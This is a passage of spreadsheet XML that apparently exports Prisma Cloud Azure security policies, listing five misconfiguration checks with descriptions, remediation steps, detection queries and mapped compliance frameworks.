          <t>ISO/IEC 27001:2022, RBI Baseline Cyber Security and Resilience Requirements, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), CIS Controls v8.1, ISO 27002:2022, NIST SP 800-171 Revision 3, CSA CCM v4.0.12, ISO/IEC 27001:2022, ISO 27002:2022, Microsoft Cloud Security Benchmark v1, ISO 27002:2022, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), ACSC Information Security Manual (ISM), Secure Controls Framework (SCF) - 2022.2.1, kashan ACSC Information Security Manual (ISM), Insurance Regulatory And Development Authority Of India, TX-RAMP Level 1, Sarbanes Oxley Act (SOX), PCI DSS v4.0, Sarbanes Oxley Act (SOX), CIS Controls v8, MLPS 2.0 (Level 2), ITSG-33, DORA, ISO/IEC 27001:2022, Secure Controls Framework (SCF) - 2024.2, ISO 27002:2022, Microsoft Cloud Security Benchmark v1, Copy of CIS Controls v8, New Zealand Information Security Manual (NZISM v3.4), Copy of ACSC Information Security Manual (ISM)-clone, Copy of New Zealand Information Security Manual (NZISM v3.4), NYDFS 23 CRR-NY 500.0, kfirdaus AWS Account-CS, NIST 800-53 Rev 5, CIS Controls v7.1, ISO/IEC 27001:2022, Framework for Adoption of Cloud Services by SEBI Regulated Entities (REs), Australian Energy Sector Cyber Security Framework (AESCSF)</t>
        </is>
      </c>
      <c r="B2385" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2385" s="2" t="inlineStr"/>
      <c r="D2385" t="inlineStr"/>
      <c r="E2385" t="inlineStr"/>
      <c r="F2385" t="inlineStr"/>
      <c r="G2385" t="b">
        <v>1</v>
      </c>
      <c r="H23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5" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J2385" t="inlineStr">
        <is>
          <t>azure-recovery-service</t>
        </is>
      </c>
      <c r="K2385" t="inlineStr">
        <is>
          <t>Azure Recovery Services vault is not configured with managed identity</t>
        </is>
      </c>
      <c r="L2385" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M2385" t="inlineStr">
        <is>
          <t>informational</t>
        </is>
      </c>
      <c r="N2385" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2385" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2385" t="inlineStr">
        <is>
          <t>build,run</t>
        </is>
      </c>
      <c r="Q2385" t="inlineStr">
        <is>
          <t>Guidelines for Personnel Security</t>
        </is>
      </c>
      <c r="R2385" t="inlineStr">
        <is>
          <t>ISM-1566</t>
        </is>
      </c>
      <c r="S2385" t="inlineStr"/>
      <c r="T2385" t="b">
        <v>0</v>
      </c>
      <c r="U2385" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2385" t="inlineStr">
        <is>
          <t>azure-recovery-service-vault</t>
        </is>
      </c>
      <c r="W2385" t="inlineStr">
        <is>
          <t>This policy identifies Recovery Services vaults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Recovery Services vault.</t>
        </is>
      </c>
      <c r="X2385" t="inlineStr">
        <is>
          <t>1. Log in to the Azure portal
2. Navigate to Recovery Services vaults dashboard
3. Click on the reported Recovery Services vault
4. Under Setting section, Click on 'Identity'
5. Configure either 'System assigned' or 'User assigned' managed identity based on your requirement.
6. Click on 'Save' 
Build Recommendation: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/azure-policies/azure-iam-policies/bc-azure-2-35
IaC: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/azure-policies/azure-iam-policies/bc-azure-2-35</t>
        </is>
      </c>
      <c r="Y2385" t="inlineStr"/>
      <c r="Z2385" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'azure' AND api.name = 'azure-recovery-service-vault' AND json.rule = properties.provisioningState equals Succeeded and (identity does not exist or identity.type equal ignore case "None")
{"category":"IAM","resourceTypes":["azurerm_recovery_services_vault"]}</t>
        </is>
      </c>
      <c r="AA2385" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2385" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2385" t="inlineStr">
        <is>
          <t>PC-AZR-ARS-871-CKV2_AZURE_35</t>
        </is>
      </c>
      <c r="AD2385" t="b">
        <v>1</v>
      </c>
      <c r="AE2385" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2385" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG23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5" t="inlineStr">
        <is>
          <t>aa72a7b0-65f3-4e15-8b62-fb3b6886f67a</t>
        </is>
      </c>
      <c r="AI2385" t="inlineStr">
        <is>
          <t>c48b08f5-9e1d-4af4-abad-6255aa7d0b56</t>
        </is>
      </c>
      <c r="AJ2385" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2385" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2386">
      <c r="A2386" t="inlineStr">
        <is>
          <t>ISO/IEC 27017:2015, APRA (CPS 234) Information Security, Cybersecurity Maturity Model Certification (CMMC) v.1.02, APRA (CPS 234) Information Security, Copy of CIS v1.2.0 (Azure), APRA (CPS 234) Information Security, Insurance Regulatory And Development Authority Of India, NIST SP 800-172, ISO/IEC 27017:2015, CSA CCM v.4.0.1, APRA (CPS 234) Information Security, CIS v1.4.0 (Azure), CIS v1.3.0 (Azure), testazure, CIS v2.1.0 (Azure) Level 2, Copy of Azure Security Benchmark (v3), ISO/IEC 27017:2015, RBI Baseline Cyber Security and Resilience Requirements, CIS v1.5.0 (Azure) - Level 2, ISO/IEC 27017:2015, Copy of CIS Controls v8, Secure Controls Framework (SCF) - 2022.2.1, MTSBv2_Azure, CIS Controls v8, Copy of Azure Security Benchmark (v3), Azure Security Benchmark (v3), NIST CSF, CIS v1.1 (Azure), ISO/IEC 27017:2015, CSA CCM v.4.0.1, NIST SP 800-171 Revision 3, Sarbanes Oxley Act (SOX), Sarbanes Oxley Act (SOX), CSA CCM v.4.0.1, ISO/IEC 27002:2013, PCI DSS v3.2.1, ISO/IEC 27002:2013, MLPS 2.0 (Level 2), ISO/IEC 27017:2015, CSA CCM v.4.0.1, Azure Security Benchmark (v3), CIS v2.0.0 (Azure) Level 2, ISO/IEC 27002:2013, SOC 2, NYDFS 23 CRR-NY 500.0, CSA CCM v.4.0.1, APRA (CPS 234) Information Security, ISO/IEC 27002:2013, Secure Controls Framework (SCF) - 2024.2, Copy of New Zealand Information Security Manual (NZISM v3.4), APRA (CPS 234) Information Security, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), Copy of Azure Security Benchmark (v3), HITRUST v.9.4.2 [Deprecated], CIS v1.3.1 (Azure), New Zealand Information Security Manual (NZISM v3.4), CIS v1.2.0 (Azure), CIS Controls v8.1, APRA (CPS 234) Information Security, ISO/IEC 27002:2013, Brazilian Data Protection Law (LGPD), NIST SP 800-171 Revision 2, Compliance Standard Test Jadempsey, CIS Controls v7.1, Azure Security Benchmark (v3), NIST SP 800-172, CSA CCM v.4.0.1, CSA CCM v.4.0.1, ISO/IEC 27018:2019</t>
        </is>
      </c>
      <c r="B2386" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2386" s="2" t="inlineStr"/>
      <c r="D2386" t="inlineStr"/>
      <c r="E2386" t="inlineStr"/>
      <c r="F2386" t="inlineStr"/>
      <c r="G2386" t="b">
        <v>1</v>
      </c>
      <c r="H23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jadempsey-alert-test,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6" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J2386" t="inlineStr">
        <is>
          <t>azure-resource-group</t>
        </is>
      </c>
      <c r="K2386" t="inlineStr">
        <is>
          <t>Azure Resource Group does not have a resource lock</t>
        </is>
      </c>
      <c r="L2386" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M2386" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N2386" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2386" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2386" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q2386" t="inlineStr">
        <is>
          <t>123</t>
        </is>
      </c>
      <c r="R2386" t="inlineStr">
        <is>
          <t>1</t>
        </is>
      </c>
      <c r="S2386" t="inlineStr">
        <is>
          <t>Policy Status Review</t>
        </is>
      </c>
      <c r="T2386" t="b">
        <v>0</v>
      </c>
      <c r="U2386" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2386" t="inlineStr">
        <is>
          <t>azure-resource-group</t>
        </is>
      </c>
      <c r="W2386" t="inlineStr">
        <is>
          <t>Azure Resource Manager locks provide a way to lock down Azure resources from being deleted or modified. The lock level can be set to either 'CanNotDelete' or 'ReadOnly'. When you apply a lock at a parent scope, all resources within the scope inherit the same lock, and the most restrictive lock takes precedence.
This policy identifies Azure Resource Groups that do not have a lock set. As a best practice, place a lock on important resources to prevent accidental or malicious modification or deletion by unauthorized users.</t>
        </is>
      </c>
      <c r="X2386" t="inlineStr">
        <is>
          <t>1. Log in to the Azure portal
2. Navigate to 'Resource groups' dashboard
3. Select the resource group that you want to lock
4. Select 'Locks' under 'Settings' from left panel, then click on 'Add'
5. Specify the lock name and type
6. Select on 'OK' to save your changes</t>
        </is>
      </c>
      <c r="Y2386" t="inlineStr"/>
      <c r="Z2386" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'azure' AND api.name = 'azure-resource-group' AND json.rule =  locks.*  size equals 0</t>
        </is>
      </c>
      <c r="AA2386" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2386" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2386" t="inlineStr">
        <is>
          <t>PC-AZR-ARM-360</t>
        </is>
      </c>
      <c r="AD2386" t="b">
        <v>1</v>
      </c>
      <c r="AE2386" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2386" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG23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jadempsey-alert-test - Notifications:email, AccountGroups:PCS Azure Accounts;,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6" t="inlineStr">
        <is>
          <t>375c75a8-b503-48d1-90a0-79ae6b3cf6a5</t>
        </is>
      </c>
      <c r="AI2386" t="inlineStr">
        <is>
          <t>10405d08-71f8-423d-913e-d67b61e19856</t>
        </is>
      </c>
      <c r="AJ2386" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2386" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2387">
      <c r="A2387" t="inlineStr">
        <is>
          <t>Azure Security Benchmark (v2), APRA (CPS 234) Information Security, Australian Cyber Security Centre (ACSC) Essential Eight - Level 2, Demo_Daryl ACSC Information Security Manual (ISM), Insurance Regulatory And Development Authority Of India, NIST SP 800-172, Microsoft Cloud Security Benchmark v1, New Zealand Information Security Manual (NZISM v3.4), CIS v1.3.1 (Azure), ISO/IEC 27002:2013, NIST CSF, CIS v1.3.0 (Azure), APRA (CPS 234) Information Security, CIS Controls v8.1, ISO/IEC 27002:2013, Azure Security Benchmark (v2), ISO/IEC 27002:2013, NIST SP 800-171 Revision 3, Copy of Azure Security Benchmark (v3), RBI Baseline Cyber Security and Resilience Requirements, Copy of CIS Controls v8, Secure Controls Framework (SCF) - 2022.2.1, CIS v1.5.0 (Azure) - Level 2, Australian Cyber Security Centre (ACSC) Essential Eight - Level 3, ITSG-33, ISO/IEC 27018:2019, CSA CCM v.4.0.1, Demo_Daryl ACSC Information Security Manual (ISM), Australian Cyber Security Centre (ACSC) Essential Eight - Level 1, CIS Controls v8, MTSBv2_Azure, APRA (CPS 234) Information Security, Insurance Regulatory And Development Authority Of India, Copy of Azure Security Benchmark (v3), Copy of CIS v1.2.0 (Azure), Azure Security Benchmark (v3), Australian Energy Sector Cyber Security Framework (AESCSF), ISO/IEC 27017:2015, Secure Controls Framework (SCF) - 2024.2, NIST SP 800-171 Revision 2, CIS v1.4.0 (Azure), Sarbanes Oxley Act (SOX), Sarbanes Oxley Act (SOX), PCI DSS v3.2.1, CIS v1.2.0 (Azure), MLPS 2.0 (Level 2), Azure Security Benchmark (v2), Copy of New Zealand Information Security Manual (NZISM v3.4), ISO/IEC 27002:2013, Azure Security Benchmark (v2), Azure Security Benchmark (v3), CIS v2.0.0 (Azure) Level 2, ISO/IEC 27017:2015, CSA CCM v.4.0.1, Australian Cyber Security Centre (ACSC) Essential Eight, Secure Controls Framework (SCF) - 2024.2, APRA (CPS 234) Information Security, ISO/IEC 27002:2013, CSA CCM v.4.0.1, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), Copy of Azure Security Benchmark (v3), HITRUST v.9.4.2 [Deprecated], ISO/IEC 27018:2019, CSA CCM v.4.0.1, TX-RAMP Level 2, ISO/IEC 27002:2013, CIS Controls v8.1, CIS Controls v8.1, CSA CCM v4.0.12, Demo_Daryl ACSC Information Security Manual (ISM), ISO/IEC 27001:2022, CSA CCM v.4.0.1, NIST 800-53 Rev 5, ISO/IEC 27002:2013, Framework for Adoption of Cloud Services by SEBI Regulated Entities (REs), CIS Controls v7.1, Azure Security Benchmark (v3), NIST SP 800-172, NIST 800-53 Rev 5, Azure Security Benchmark (v2), Azure Security Benchmark (v2), CIS v2.1.0 (Azure) Level 2, PCI DSS v3.2.1</t>
        </is>
      </c>
      <c r="B2387" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2387" s="2" t="inlineStr"/>
      <c r="D2387" t="inlineStr"/>
      <c r="E2387" t="inlineStr"/>
      <c r="F2387" t="inlineStr"/>
      <c r="G2387" t="b">
        <v>1</v>
      </c>
      <c r="H23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7" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J2387" t="inlineStr">
        <is>
          <t>azure-role-assignment</t>
        </is>
      </c>
      <c r="K2387" t="inlineStr">
        <is>
          <t>Azure Custom Role Administering Resource Locks not assigned</t>
        </is>
      </c>
      <c r="L2387" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M2387" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N2387" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2387" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2387" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q2387" t="inlineStr">
        <is>
          <t>Guidelines for Personnel Security</t>
        </is>
      </c>
      <c r="R2387" t="inlineStr">
        <is>
          <t>ISM-1648</t>
        </is>
      </c>
      <c r="S2387" t="inlineStr"/>
      <c r="T2387" t="b">
        <v>0</v>
      </c>
      <c r="U2387" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2387" t="inlineStr">
        <is>
          <t>azure-role-assignment</t>
        </is>
      </c>
      <c r="W2387" t="inlineStr">
        <is>
          <t>This policy identifies Azure Custom Role Administering Resource Locks which are not assigned to any user. Resource locking feature helps to prevent resource being modified or deleted unintentional by any user and prevents damage caused by it. It is recommended to create a custom role for Resource Locks and assign to appropriate user.</t>
        </is>
      </c>
      <c r="X2387" t="inlineStr">
        <is>
          <t>1. Log in to the Azure portal
2. Navigate to 'Subscriptions', and select the subscription from the list where you want the custom role
3. Select 'Access control (IAM)'
If already custom role has been created for resource locks, then go to step 16
4. Click on 'Add' from top tab and select 'Add custom role'
5. Enter 'Resource Lock Administrator' in the 'Custom role name' field
6. Enter 'Can Administer Resource Locks' in the 'Description' field
7. Select 'Start from scratch' for 'Baseline permissions'
8. Click 'Next'
9. Select 'Add permissions' from top 'Permissions' tab
10. Search for 'Microsoft.Authorization/locks' in the 'Search for a permission' box
11. Select 'Microsoft.Authorization'
12. Click on 'Permission' checkbox to select all permissions
13. Click on 'Add'
14. Click 'Review+create'
15. Click 'Create' to create custom role for resource locks
16. In 'Access control (IAM)' select 'Add role assignment'
17. Select the custom role created above from 'Role' drop down
18. Select 'User, group, or service principal' from 'Assign access to' drop down
19. Search for user to assign the custom role in 'Select' field
20. Click on 'Save'</t>
        </is>
      </c>
      <c r="Y2387" t="inlineStr"/>
      <c r="Z2387" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'azure' AND api.name = 'azure-role-assignment' AND json.rule = (properties.roleDefinition.properties.type equals CustomRole and (properties.roleDefinition.properties.permissions[?any((actions[*] equals Microsoft.Authorization/locks/delete and actions[*] equals Microsoft.Authorization/locks/read and actions[*] equals Microsoft.Authorization/locks/write) or actions[*] equals Microsoft.Authorization/locks/*)] exists) and (properties.roleDefinition.properties.permissions[?any(notActions[*] equals Microsoft.Authorization/locks/delete or notActions[*] equals Microsoft.Authorization/locks/read or notActions[*] equals Microsoft.Authorization/locks/write or notActions[*] equals Microsoft.Authorization/locks/*)] does not exist)) as X; count(X) less than 1</t>
        </is>
      </c>
      <c r="AA2387" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2387" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2387" t="inlineStr">
        <is>
          <t>PC-AZR-ARM-618</t>
        </is>
      </c>
      <c r="AD2387" t="b">
        <v>1</v>
      </c>
      <c r="AE2387" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2387" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG23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7" t="inlineStr">
        <is>
          <t>bc47859c-edf2-4485-808b-2b60b3893e4f</t>
        </is>
      </c>
      <c r="AI2387" t="inlineStr">
        <is>
          <t>ff474a38-affb-4434-aa62-4ebf346d234b</t>
        </is>
      </c>
      <c r="AJ2387" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2387" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2388">
      <c r="A2388" t="inlineStr">
        <is>
          <t>ISO/IEC 27001:2022, Azure Security Benchmark (v2), Copy of Azure Security Benchmark (v3), APRA (CPS 234) Information Security, HIPAA, Australian Cyber Security Centre (ACSC) Essential Eight - Level 2, Demo_Daryl ACSC Information Security Manual (ISM), RBI Baseline Cyber Security and Resilience Requirements, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), CIS Controls v8.1, ISO 27002:2022, Microsoft Cloud Security Benchmark v1, Copy of Azure Security Benchmark (v3), New Zealand Information Security Manual (NZISM v3.4), Fedramp (Moderate), Copy of CIS v1.2.0 (Azure), ISO/IEC 27002:2013, NIST SP 800-171 Revision 3, NIST CSF, APRA (CPS 234) Information Security, ISO/IEC 27001:2022, ISO 27002:2022, NIST 800-53 Rev 5, ISO/IEC 27002:2013, NIST SP 800-171 Revision 3, Azure Security Benchmark (v2), ISO 27002:2022, Azure Security Benchmark (v3), ISO/IEC 27002:2013, NIST SP 800-172, TX-RAMP Level 2, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), HITRUST CSF v.11.2.0, NIST SP 800-171 Revision 3, ACSC Information Security Manual (ISM), CIS v1.3.1 (Azure), Secure Controls Framework (SCF) - 2022.2.1, Australian Cyber Security Centre (ACSC) Essential Eight - Level 3, HIPAA, ISO/IEC 27018:2019, kashan ACSC Information Security Manual (ISM), CSA CCM v.4.0.1, Demo_Daryl ACSC Information Security Manual (ISM), Australian Cyber Security Centre (ACSC) Essential Eight - Level 1, APRA (CPS 234) Information Security, Insurance Regulatory And Development Authority Of India, MTSBv2_Azure, ISO/IEC 27017:2015, NIST SP 800-171 Revision 2, CIS v1.2.0 (Azure), Sarbanes Oxley Act (SOX), PCI DSS v4.0, Secure Controls Framework (SCF) - 2024.2, Sarbanes Oxley Act (SOX), CDC NIST 800-53 Rev4, PCI DSS v3.2.1, Azure Security Benchmark (v3), CIS Controls v8, MLPS 2.0 (Level 2), Azure Security Benchmark (v2), Copy of New Zealand Information Security Manual (NZISM v3.4), ISO/IEC 27002:2013, Azure Security Benchmark (v2), SOC 2, ISO/IEC 27017:2015, CSA CCM v.4.0.1, SOC 2, Australian Cyber Security Centre (ACSC) Essential Eight, ISO/IEC 27001:2022, Cybersecurity Maturity Model Certification (CMMC) v.1.02, Secure Controls Framework (SCF) - 2024.2, APRA (CPS 234) Information Security, ISO/IEC 27002:2013, CSA CCM v.4.0.1, HITRUST v.9.4.2 [Deprecated], CIS v1.5.0 (Azure) - Level 1, NIST 800-53 Rev4, TX-RAMP Level 1, ITSG-33, ISO 27002:2022, Copy of CIS Controls v8, ISO/IEC 27018:2019, Copy of ACSC Information Security Manual (ISM)-clone, CSA CCM v.4.0.1, ISO/IEC 27002:2013, CIS v1.4.0 (Azure), CIS v1.3.0 (Azure), CSA CCM v4.0.12, Demo_Daryl ACSC Information Security Manual (ISM), CyberSecurity Law of the People's Republic of China, ISO/IEC 27001:2022, kfirdaus AWS Account-CS, NIST 800-53 Rev 5, CSA CCM v.4.0.1, Brazilian Data Protection Law (LGPD), NIST 800-53 Rev 5, CIS Controls v7.1, ISO/IEC 27002:2013, ISO/IEC 27001:2022, Framework for Adoption of Cloud Services by SEBI Regulated Entities (REs), NIST 800-53 Rev 5, Azure Security Benchmark (v2), Azure Security Benchmark (v2), PCI DSS v3.2.1</t>
        </is>
      </c>
      <c r="B2388" s="2" t="inlineStr">
        <is>
          <t>MAYBE</t>
        </is>
      </c>
      <c r="C2388" s="2" t="inlineStr"/>
      <c r="D2388" t="n">
        <v>0</v>
      </c>
      <c r="E2388" t="n">
        <v>5</v>
      </c>
      <c r="F2388" t="n">
        <v>0</v>
      </c>
      <c r="G2388" t="b">
        <v>1</v>
      </c>
      <c r="H23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8" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J2388" t="inlineStr">
        <is>
          <t>azure-role-definition</t>
        </is>
      </c>
      <c r="K2388" t="inlineStr">
        <is>
          <t>Azure subscriptions with custom roles are overly permissive</t>
        </is>
      </c>
      <c r="L2388" t="inlineStr">
        <is>
          <t>PRIVILEGE_ESCALATION</t>
        </is>
      </c>
      <c r="M2388" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N2388" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2388" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2388" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q2388" t="inlineStr">
        <is>
          <t>Guidelines for Personnel Security</t>
        </is>
      </c>
      <c r="R2388" t="inlineStr">
        <is>
          <t>ISM-1566</t>
        </is>
      </c>
      <c r="S2388" t="inlineStr">
        <is>
          <t>Policy Status Review,Prisma_Cloud</t>
        </is>
      </c>
      <c r="T2388" t="b">
        <v>0</v>
      </c>
      <c r="U2388" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2388" t="inlineStr">
        <is>
          <t>azure-role-definition</t>
        </is>
      </c>
      <c r="W2388" t="inlineStr">
        <is>
          <t>This policy identifies azure subscriptions with custom roles are overly permissive. Least privilege access rule should be followed and only necessary privileges should be assigned instead of allowing full administrative access.</t>
        </is>
      </c>
      <c r="X2388" t="inlineStr">
        <is>
          <t>Check the usage of the role identified. Verify impact caused by Updating/deleting the role. Then follow below URL for updating or deleting custom role:
https://learn.microsoft.com/en-us/azure/role-based-access-control/custom-roles-portal#update-a-custom-role</t>
        </is>
      </c>
      <c r="Y2388" t="inlineStr"/>
      <c r="Z2388" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'azure' AND api.name = 'azure-role-definition' AND json.rule = properties.type equals "CustomRole" and properties.assignableScopes[*] contains "/" and properties.permissions[*].actions[*] starts with "*"</t>
        </is>
      </c>
      <c r="AA2388" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2388" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2388" t="inlineStr">
        <is>
          <t>PC-AZR-ARM-501</t>
        </is>
      </c>
      <c r="AD2388" t="b">
        <v>1</v>
      </c>
      <c r="AE2388" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2388" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG23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8" t="inlineStr">
        <is>
          <t>40c06b29-589e-4f1f-8c02-8dafdc80cce6</t>
        </is>
      </c>
      <c r="AI2388" t="inlineStr">
        <is>
          <t>aa1e6ee8-89aa-46eb-83a2-c2d8bd925117</t>
        </is>
      </c>
      <c r="AJ2388" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2388" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2389">
      <c r="A2389" t="inlineStr">
        <is>
          <t>CIS v1.5.0 (Azure) - Level 2, MLPS 2.0 (Level 2), Secure Controls Framework (SCF) - 2024.2, Secure Controls Framework (SCF) - 2024.2, MLPS 2.0 (Level 2), jmontufar, Secure Controls Framework (SCF) - 2022.2.1, Microsoft Cloud Security Benchmark v1, Insurance Regulatory And Development Authority Of India, CIS v2.0.0 (Azure) Level 2, BHN bishvesh, ITSG-33, CIS v2.1.0 (Azure) Level 2, TX-RAMP Level 2, Secure Controls Framework (SCF) - 2022.2.1, MLPS 2.0 (Level 2)</t>
        </is>
      </c>
      <c r="B2389" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2389" s="2" t="inlineStr"/>
      <c r="D2389" t="inlineStr"/>
      <c r="E2389" t="inlineStr"/>
      <c r="F2389" t="inlineStr"/>
      <c r="G2389" t="b">
        <v>1</v>
      </c>
      <c r="H2389" t="inlineStr">
        <is>
          <t>ADAM TEST EXEMPT LIST, ALERT ALL test, Audit jmontufar, Azure AKS cluster Azure CNI networking not enabled, AzureDriftDetection, BG-AH-Email-Test, BPtestTag, Critical Misconfigs to ServiceNow, DM_TEST_GCP_test, Default Alert Rule, Exposed Cloud Functions, GCP Merchant, IAM-MA Alert Rule, JEC-Find all Security Groups that opens port 22 to the internet (and are attached to an EC2 instance)., KL_Test_Rule3, MA-90 days rotation, NH-test,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89" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J2389" t="inlineStr">
        <is>
          <t>azure-security-center</t>
        </is>
      </c>
      <c r="K2389" t="inlineStr">
        <is>
          <t>Azure Microsoft Defender for Cloud set to Off for DNS</t>
        </is>
      </c>
      <c r="L2389" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M2389" t="inlineStr">
        <is>
          <t>informational</t>
        </is>
      </c>
      <c r="N2389" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2389" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2389" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q2389" t="inlineStr">
        <is>
          <t>10001</t>
        </is>
      </c>
      <c r="R2389" t="inlineStr">
        <is>
          <t>10001-1</t>
        </is>
      </c>
      <c r="S2389" t="inlineStr">
        <is>
          <t>vstoyko : test</t>
        </is>
      </c>
      <c r="T2389" t="b">
        <v>0</v>
      </c>
      <c r="U2389" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2389" t="inlineStr">
        <is>
          <t>azure-security-center-settings</t>
        </is>
      </c>
      <c r="W2389" t="inlineStr">
        <is>
          <t>This policy identifies Azure Microsoft Defender for Cloud which has a defender setting for DNS set to Off. Enabling Azure Defender for the cloud provides advanced security capabilities like threat intelligence, anomaly detection, and behavior analytics. Defender for DNS monitors the queries and detects suspicious activities without the need for any additional agents on your resources. It is highly recommended to enable Azure Defender for DNS.
Note: This policy does check for classic Defender for DNS configuration. If Defender for Servers Plan 2 is enabled, the defender setting for DNS will be set by default.</t>
        </is>
      </c>
      <c r="X2389" t="inlineStr">
        <is>
          <t>For customers who are using  Microsoft Defender for Servers Plan 2:
1. Go to Microsoft Defender for Cloud
2. Select Environment Settings
3. Click on the subscription name
4. Select the Defender plans
5. Ensure Status is set to On for Servers Plan 2
For customers who are using Microsoft Defender for Servers Plan 1:
1. Go to Microsoft Defender for Cloud
2. Select Environment Settings
3. Click on the subscription name
4. Select the Defender plans
5. Ensure Status is set to On for DNS.</t>
        </is>
      </c>
      <c r="Y2389" t="inlineStr"/>
      <c r="Z2389" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'azure' AND api.name = 'azure-security-center-settings' AND json.rule = pricings[?any(name equals VirtualMachines and properties.pricingTier equal ignore case Standard and properties.subPlan equal ignore case P2)] does not exist or pricings[?any(name equals Dns and properties.deprecated is false and properties.pricingTier does not equal Standard)] exists</t>
        </is>
      </c>
      <c r="AA2389" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2389" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2389" t="inlineStr">
        <is>
